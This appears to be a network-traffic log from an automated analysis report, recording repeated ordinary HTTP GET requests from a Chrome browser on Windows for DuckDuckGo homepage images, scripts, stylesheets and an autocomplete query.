Source: global traffic	HTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-mobile-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/macos.e15f833d.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /_next/data/B-ys9soUGnFD59xVO_HFJ/about.json HTTP/1.1host: duckduckgo.comx-nextjs-data: 1sec-ch-ua-platform: "Windows"purpose: prefetchuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/chrome-lg.a4859fb2.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/edge-lg.36af7682.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/firefox-lg.8efad702.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/opera-lg.237c4418.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/email-protection-ios-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-back-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/4022-f9b0d7298e473079.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /_next/static/chunks/pages/about-bfc787bd96bcc6c8.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7purpose: prefetchsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /country.json HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /privacy-pro-eligible.json HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/css/f9b91cd30bc88454.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/macos.e15f833d.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/chrome-lg.a4859fb2.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/data/B-ys9soUGnFD59xVO_HFJ/about.json HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/firefox-lg.8efad702.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/edge-lg.36af7682.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/media/opera-lg.237c4418.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/email-protection-ios-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/css/cbe9deb940241e83.css HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /_next/static/css/f9b91cd30bc88454.css HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-mobile-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-front-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=f&kl=wt-wt HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ac/?q=f&kl=wt-wt HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
